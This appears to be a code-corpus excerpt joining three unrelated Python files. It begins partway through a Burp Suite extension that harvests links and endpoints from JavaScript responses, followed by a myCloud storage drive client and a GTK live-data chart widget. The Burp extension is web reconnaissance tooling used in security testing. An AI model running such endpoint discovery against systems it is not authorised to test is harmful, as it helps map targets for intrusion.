.addComponent(self.clearBtn)
.addComponent(self.exportBtn)
)
)
)
layout.setVerticalGroup(
layout.createParallelGroup()
.addGroup(layout.createParallelGroup()
.addGroup(layout.createSequentialGroup()
.addComponent(self.outputLabel)
.addComponent(self.logPane)
.addComponent(self.clearBtn)
.addComponent(self.exportBtn)
)
)
)
def getTabCaption(self):
return "BurpJSLinkFinder"
def getUiComponent(self):
return self.tab
def clearLog(self, event):
self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n" )
def exportLog(self, event):
chooseFile = JFileChooser()
ret = chooseFile.showDialog(self.logPane, "Choose file")
filename = chooseFile.getSelectedFile().getCanonicalPath()
print("\n" + "Export to : " + filename)
open(filename, 'w', 0).write(self.outputTxtArea.text)
def doPassiveScan(self, ihrr):
try:
urlReq = ihrr.getUrl()
testString = str(urlReq)
linkA = linkAnalyse(ihrr,self.helpers)
# check if JS file
if ".js" in str(urlReq):
# Exclude casual JS files
if any(x in testString for x in JSExclusionList):
print("\n" + "[-] URL excluded " + str(urlReq))
else:
self.outputTxtArea.append("\n" + "[+] Valid URL found: " + str(urlReq))
issueText = linkA.analyseURL()
for counter, issueText in enumerate(issueText):
#print("TEST Value returned SUCCESS")
self.outputTxtArea.append("\n" + "\t" + str(counter)+' - ' +issueText['link'])
issues = ArrayList()
issues.add(SRI(ihrr, self.helpers))
return issues
except UnicodeEncodeError:
print ("Error in URL decode.")
return None
def consolidateDuplicateIssues(self, isb, isa):
return -1
def extensionUnloaded(self):
print "Burp JS LinkFinder unloaded"
return
class linkAnalyse():
def __init__(self, reqres, helpers):
self.helpers = helpers
self.reqres = reqres
regex_str = """
(?:"|') # Start newline delimiter
(
((?:[a-zA-Z]{1,10}://|//) # Match a scheme [a-Z]*1-10 or //
[^"'/]{1,}\. # Match a domainname (any character + dot)
[a-zA-Z]{2,}[^"']{0,}) # The domainextension and/or path
|
((?:/|\.\./|\./) # Start with /,../,./
[^"'><,;| *()(%%$^/\\\[\]] # Next character can't be...
[^"'><,;|()]{1,}) # Rest of the characters can't be
|
([a-zA-Z0-9_\-/]{1,}/ # Relative endpoint with /
[a-zA-Z0-9_\-/]{1,} # Resource name
\.(?:[a-zA-Z]{1,4}|action) # Rest + extension (length 1-4 or action)
(?:[\?|/][^"|']{0,}|)) # ? mark with parameters
|
([a-zA-Z0-9_\-]{1,} # filename
\.(?:php|asp|aspx|jsp|json|
action|html|js|txt|xml) # . + extension
(?:\?[^"|']{0,}|)) # ? mark with parameters
)
(?:"|') # End newline delimiter
"""
def parser_file(self, content, regex_str, mode=1, more_regex=None, no_dup=1):
#print ("TEST parselfile #2")
regex = re.compile(regex_str, re.VERBOSE)
items = [{"link": m.group(1)} for m in re.finditer(regex, content)]
if no_dup:
# Remove duplication
all_links = set()
no_dup_items = []
for item in items:
if item["link"] not in all_links:
all_links.add(item["link"])
no_dup_items.append(item)
items = no_dup_items
# Match Regex
filtered_items = []
for item in items:
# Remove other capture groups from regex results
if more_regex:
if re.search(more_regex, item["link"]):
#print ("TEST parselfile #3")
filtered_items.append(item)
else:
filtered_items.append(item)
return filtered_items
# Potential for use in the future...
def threadAnalysis(self):
thread = Thread(target=self.analyseURL)  # pass the callable itself; calling it here would run it immediately
thread.daemon = True
thread.start()
def analyseURL(self):
endpoints = ""
#print("TEST AnalyseURL #1")
mime_type=self.helpers.analyzeResponse(self.reqres.getResponse()).getStatedMimeType()
if mime_type.lower() == 'script':
url = self.reqres.getUrl()
encoded_resp=binascii.b2a_base64(self.reqres.getResponse())
decoded_resp=base64.b64decode(encoded_resp)
endpoints=self.parser_file(decoded_resp, self.regex_str)
#print("TEST AnalyseURL #2")
return endpoints
return endpoints
class SRI(IScanIssue,ITab):
def __init__(self, reqres, helpers):
self.helpers = helpers
self.reqres = reqres
def getHost(self):
return self.reqres.getHost()
def getPort(self):
return self.reqres.getPort()
def getProtocol(self):
return self.reqres.getProtocol()
def getUrl(self):
return self.reqres.getUrl()
def getIssueName(self):
return "Linkfinder Analysed JS files"
def getIssueType(self):
return 0x08000000 # See http:#portswigger.net/burp/help/scanner_issuetypes.html
def getSeverity(self):
return "Information" # "High", "Medium", "Low", "Information" or "False positive"
def getConfidence(self):
return "Certain" # "Certain", "Firm" or "Tentative"
def getIssueBackground(self):
return str("JS files holds links to other parts of web applications. Refer to TAB for results.")
def getRemediationBackground(self):
return "This is an <b>informational</b> finding only.<br>"
def getIssueDetail(self):
return str("Burp Scanner has analysed the following JS file for links: <b>"
"%s</b><br><br>" % (self.reqres.getUrl().toString()))
def getRemediationDetail(self):
return None
def getHttpMessages(self):
#print ("................raising issue................")
rra = [self.reqres]
return rra
def getHttpService(self):
return self.reqres.getHttpService()
if __name__ in ('__main__', 'main'):
EventQueue.invokeLater(Run(BurpExtender))
|
drive_client.py
|
import logging
import asyncio
import os
import inject
from enum import Enum
from typing import List, AsyncIterator
from datetime import datetime
from collections import deque
from threading import Thread
from dataclasses import dataclass
from mycloud.constants import CHUNK_SIZE
from mycloud.mycloudapi.helper import generator_to_stream
from mycloud.drive.exceptions import (DriveFailedToDeleteException,
DriveNotFoundException)
from mycloud.mycloudapi import (MyCloudRequestExecutor, MyCloudResponse,
ObjectResourceBuilder)
from mycloud.mycloudapi.requests.drive import (DeleteObjectRequest,
GetObjectRequest,
MetadataRequest,
PutObjectRequest,
MyCloudMetadata,
RenameRequest,
FileEntry,
DirEntry)
class ReadStream:
def __init__(self, content):
self._content = content
self._loop = asyncio.get_event_loop()
def read(self, length):
res = asyncio.run_coroutine_threadsafe(
self._content.read(length), self._loop)
return res.result()
async def read_async(self, length):
return await self._content.read(length)
def close(self):
pass
class WriteStream:
def __init__(self, exec_stream):
self._loop = asyncio.get_event_loop()
self._exec = exec_stream
# TODO: queue size should depend on size of individual items?
self._queue = asyncio.Queue(maxsize=1)
self._closed = False
self._thread = None
def writelines(self, generator):
stream = generator_to_stream(generator)
asyncio.run_coroutine_threadsafe(
self._exec(stream), self._loop).result()
def write(self, bytes):
self._put_queue(bytes)
self._start()
async def write_async(self, bytes):
await self._put_queue_async(bytes)
self._start()
def close(self):
self._closed = True
if self._thread:
self._thread.join()
del self._queue
async def _put_queue_async(self, item):
await self._queue.put(item)
def _put_queue(self, item):
asyncio.run_coroutine_threadsafe(
self._queue.put(item), self._loop).result()
def _start(self):
if self._thread is not None:
return
def r():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(self._exec(self._generator()))
self._thread = Thread(target=r)
self._thread.start()
async def _generator(self):
while not self._closed or not self._queue.empty():
if not self._queue.empty(): # TODO: should be done with asyncio
yield self._queue.get_nowait()
class EntryType(Enum):
File = 0
Dir = 1
Enoent = 2
@dataclass
class EntryStats:
entry_type: EntryType
name: str
path: str
creation_time: datetime
modification_time: datetime
NO_ENTRY = EntryStats(EntryType.Enoent, '', '', datetime.min, datetime.min)
ROOT_ENTRY = EntryStats(EntryType.Dir, '/', '/', datetime.min, datetime.min)
class DriveClient:
request_executor: MyCloudRequestExecutor = inject.attr(
MyCloudRequestExecutor)
async def ls(self, remote: str) -> MyCloudMetadata:
return await self._get_directory_metadata_internal(remote)
async def stat(self, path: str):
normed = os.path.normpath(path)
if normed == '/':
return ROOT_ENTRY
basename = os.path.basename(normed)
try:
metadata = await self.ls(os.path.dirname(normed))
def first(l):
try:
return next(filter(lambda x: x.name == basename, l))
except StopIteration:
return None
file = first(metadata.files)
if file is not None:
return EntryStats(
EntryType.File,
name=file.name,
path=file.path,
creation_time=file.creation_time,
modification_time=file.modification_time)
directory = first(metadata.dirs)
if directory is not None:
return EntryStats(
EntryType.Dir,
name=directory.name,
path=directory.path,
creation_time=directory.creation_time,
modification_time=directory.modification_time)
return NO_ENTRY
except DriveNotFoundException:
return NO_ENTRY
async def open_read(self, path: str):
get = GetObjectRequest(path, is_dir=False)
resp = await self.request_executor.execute(get)
DriveClient._raise_404(resp)
return ReadStream(resp.result.content)
async def open_write(self, path: str):
def exec_stream(g):
return self.request_executor.execute(
PutObjectRequest(path, g, is_dir=False))
return WriteStream(exec_stream)
async def mkfile(self, path: str):
put_request = PutObjectRequest(path, None, False)
await self.request_executor.execute(put_request)
async def mkdirs(self, path: str):
put_request = PutObjectRequest(path, None, True)
await self.request_executor.execute(put_request)
async def move(self, from_path, to_path):
stat = await self.stat(from_path)
rename_request = RenameRequest(
from_path, to_path, stat.entry_type == EntryType.File)
await self.request_executor.execute(rename_request)
async def copy(self, from_path, to_path):
# assume it's a file for now?
read_stream = await self.open_read(from_path)
write_stream = await self.open_write(to_path)
while True:
read = await read_stream.read_async(CHUNK_SIZE)
if not read:
break
await write_stream.write_async(read)
read_stream.close()
write_stream.close()
async def delete(self, path: str):
stat = await self.stat(path)
return await self._delete_internal(path, stat.entry_type == EntryType.Dir)
async def _delete_internal(self, path: str, is_dir):
try:
await self._delete_single_internal(path, is_dir)
except DriveFailedToDeleteException:
if not is_dir:
raise # probably an unrecoverable error, if it's not a directory
metadata = await self._get_directory_metadata_internal(path)
for remote_file in metadata.files:
await self._delete_internal(remote_file.path, False)
for directory in metadata.dirs:
await self._delete_internal(directory.path, True)
async def _delete_single_internal(self, path: str, is_dir):
delete_request = DeleteObjectRequest(path, is_dir)
resp = await self.request_executor.execute(delete_request)
DriveClient._raise_404(resp)
if not resp.success:
logging.info(f'Failed to delete {path}')
raise DriveFailedToDeleteException
async def _get_directory_metadata_internal(self, path: str) -> MyCloudMetadata:
req = MetadataRequest(path)
resp = await self.request_executor.execute(req)
DriveClient._raise_404(resp)
return await resp.formatted()
@staticmethod
def _raise_404(response: MyCloudResponse):
if response.result.status == 404:
raise DriveNotFoundException
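# Usage sketch (illustrative only; remote paths are hypothetical and inject must
# be configured with a MyCloudRequestExecutor, as the class attribute requires):
#     async def example():
#         client = DriveClient()
#         entry = await client.stat('/Drive/reports/2021.txt')
#         if entry.entry_type == EntryType.File:
#             await client.copy('/Drive/reports/2021.txt', '/Drive/backup/2021.txt')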
|
ticker.py
|
import os
import threading
import time
from collections import defaultdict
import atexit
import numpy
from gi.repository import Gtk, GObject
from matplotlib import rcParams
from matplotlib.animation import FuncAnimation
from matplotlib.backends.backend_gtk3cairo import FigureCanvasGTK3Cairo as FigureCanvas
from matplotlib.figure import Figure
from matplotlib.lines import Line2D
from mxdc.utils import misc
from mxdc.widgets import dialogs
rcParams['font.family'] = 'Cantarell'
rcParams['font.size'] = 10
COLORS = [
'#1f77b4',
'#ff7f0e',
'#2ca02c',
'#d62728',
'#9467bd',
'#8c564b',
'#e377c2',
'#7f7f7f',
'#bcbd22',
'#17becf'
]
class TickerChart(Gtk.Box):
__gsignals__ = {
'cursor-time': (GObject.SignalFlags.RUN_FIRST, None, (object,)),
}
def __init__(self, interval=100, view=20, keep=None, linewidth=1):
super().__init__()
self.fig = Figure(dpi=72)
self.canvas = FigureCanvas(self.fig)
self.pack_start(self.canvas, True, True, 0)
self.data = {}
self.plots = {}
self.info = {}
self.alternates = set()
self.active = None
self.axes = []
self.axes.append(self.fig.add_subplot(111))
self.fig.subplots_adjust(left=0.12, right=0.88)
self.axes[0].set_xlabel('seconds ago')
self.interval = interval # milliseconds
self.view_range = view # seconds
self.keep_range = keep or (view * 4) # seconds
self.linewidth = linewidth
self.keep_size = int(self.keep_range * 1000 / self.interval)
self.view_step = view // 2
self.deviation = 20
self.view_time = time.time()
self.add_data('time')
self.paused = False
self.show_all()
def pause(self):
self.paused = True
def resume(self):
self.paused = False
def zoom_out(self):
self.view_range = max(self.view_range - self.view_step, self.view_step)
self.update()
def zoom_in(self):
self.view_range = min(self.view_range + self.view_step, self.keep_range)
self.update()
def incr_margin(self):
self.deviation = min(self.deviation + 5, 50)
self.update()
def decr_margin(self):
self.deviation = max(self.deviation - 5, 5)
self.update()
def add_data(self, name):
if name in self.data:
return
self.data[name] = numpy.empty(self.keep_size)
self.data[name][:] = numpy.nan
def resize_data(self):
for name, data in list(self.data.items()):
self.data[name] = numpy.empty(self.keep_size)
if self.keep_size > len(data):
self.data[name][-len(data):] = data
else:
self.data[name] = data[-self.keep_size:]
def select_active(self, name):
if name in self.alternates:
self.active = name
self.axes[1].set_ylabel(name)
def add_alternate(self, name):
self.alternates.add(name)
def shift_data(self):
for name, data in list(self.data.items()):
data[:-1] = data[1:]
def add_plot(self, name, color=None, linestyle='-', axis=0, alternate=False):
assert axis in [0, 1], 'axis must be 0 or 1'
if axis == 1 and len(self.axes) == 1:
self.axes.append(self.axes[0].twinx())
if not color:
color = COLORS[len(self.plots)]
self.plots[name] = Line2D([], [], color=color, linewidth=self.linewidth, linestyle=linestyle)
self.axes[axis].add_line(self.plots[name])
self.axes[axis].set_ylabel(name, color=color)
self.info[name] = {'color': color, 'linestyle': linestyle, 'axis': axis}
if alternate:
self.add_alternate(name)
self.select_active(name)
self.add_data(name)
def clear(self):
for name, line in list(self.plots.items()):
self.data[name][:] = numpy.nan
def update(self):
if self.paused:
return
selector = ~numpy.isnan(self.data['time'])
selector[selector] = (
(self.data['time'][selector] > (self.view_time - self.view_range))
& (self.data['time'][selector] <= self.view_time)
)
if selector.sum() < 2:
return
now = self.data['time'][selector][-1]
x_data = self.data['time'][selector] - now
xmin, xmax = min(x_data.min(), -self.view_range), x_data.max()
extrema = defaultdict(lambda: (numpy.nan, numpy.nan))
for name, line in list(self.plots.items()):
if name in self.alternates and name != self.active: continue
axis = self.info[name]['axis']
ymin, ymax = extrema[axis]
y_data = self.data[name][selector]
mn, mx = misc.get_min_max(y_data, ldev=self.deviation, rdev=self.deviation)
ymin, ymax = numpy.nanmin([ymin, mn]), numpy.nanmax([ymax, mx])
extrema[axis] = (ymin, ymax)
line.set_data(x_data, y_data)
for i, (ymin, ymax) in list(extrema.items()):
if ymin != ymax:
self.axes[i].set_ylim(ymin, ymax)
if xmin != xmax:
self.axes[i].set_xlim(xmin, xmax)
def redraw(self):
self.canvas.draw_idle()
def animate(self, i):
self.update()
return list(self.plots.values())
def save(self):
dialog = Gtk.FileChooserDialog(
"Save Chart ...", dialogs.MAIN_WINDOW, Gtk.FileChooserAction.SAVE,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, Gtk.STOCK_SAVE, Gtk.ResponseType.OK)
)
dialog.set_size_request(600, 300)
response = dialog.run()
if response == Gtk.ResponseType.OK:
img_filename = dialog.get_filename()
if os.access(os.path.dirname(img_filename), os.W_OK):
self.fig.savefig(img_filename)
dialog.destroy()
class ChartManager(GObject.GObject):
def __init__(self, interval=100, view=20):
GObject.GObject.__init__(self)
self.chart = TickerChart(interval=interval, view=view)
self.sources = {}
self.values = {}
self.interval = interval / 1000. # convert from milliseconds to seconds
self.animation = FuncAnimation(self.chart.fig, self.chart.animate, None, interval=interval, blit=False)
self.start()
atexit.register(self.stop)
def add_plot(self, dev, name, signal='changed', color=None, linestyle='-', axis=0, alternate=False):
self.chart.add_plot(name, color=color, linestyle=linestyle, axis=axis, alternate=alternate)
self.values[name] = numpy.nan
self.sources[name] = dev.connect(signal, self.collect_data, name)
def select_active(self, name):
self.chart.select_active(name)
def zoom_in(self, *args, **kwargs):
self.chart.zoom_in()
def zoom_out(self, *args, **kwargs):
self.chart.zoom_out()
def clear(self, *args, **kwargs):
self.chart.clear()
def save(self, *args, **kwargs):
self.chart.save()
def collect_data(self, dev, value, name):
self.values[name] = value
def start(self):
"""Start the Data monitor thread """
self._stopped = False
worker_thread = threading.Thread(name="TickerSampler", target=self.update_data)
worker_thread.daemon = True
worker_thread.start()
def stop(self):
self._stopped = True
def pause(self, *args, **kwargs):
self.chart.pause()
def resume(self, *args, **kwargs):
self.chart.resume()
def is_paused(self):
return self.chart.paused
def update_data(self):
# update the values of the array every interval seconds, shift left
while not self._stopped:
self.chart.shift_data()
if not self.is_paused():
for name, value in list(self.values.items()):
if name in self.chart.data:
self.chart.data[name][-1] = value
self.chart.data['time'][-1] = time.time()
self.chart.view_time = time.time()
time.sleep(self.interval)
def cleanup(self):
self.stop()
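# Usage sketch (illustrative only; the device objects are hypothetical GObjects
# that emit the given signal with a numeric value, as add_plot expects):
#     manager = ChartManager(interval=100, view=20)
#     manager.add_plot(beam_monitor, 'Intensity', signal='changed', axis=0)
#     manager.add_plot(temp_sensor, 'Temperature', signal='changed', axis=1, color='#d62728')
#     manager.chart  # a Gtk.Box (TickerChart) that can be packed into a window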
|